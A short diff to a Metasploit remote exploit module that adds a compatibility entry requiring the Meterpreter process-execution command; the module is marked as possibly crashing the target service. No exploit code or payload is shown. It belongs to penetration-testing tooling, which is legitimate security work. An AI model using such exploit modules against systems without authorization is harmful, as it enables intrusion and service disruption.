@@ -267,6 +267,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SERVICE_DOWN, ],
         },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_sys_process_execute
+            ]
+          }
+        },
       )
     )
   end
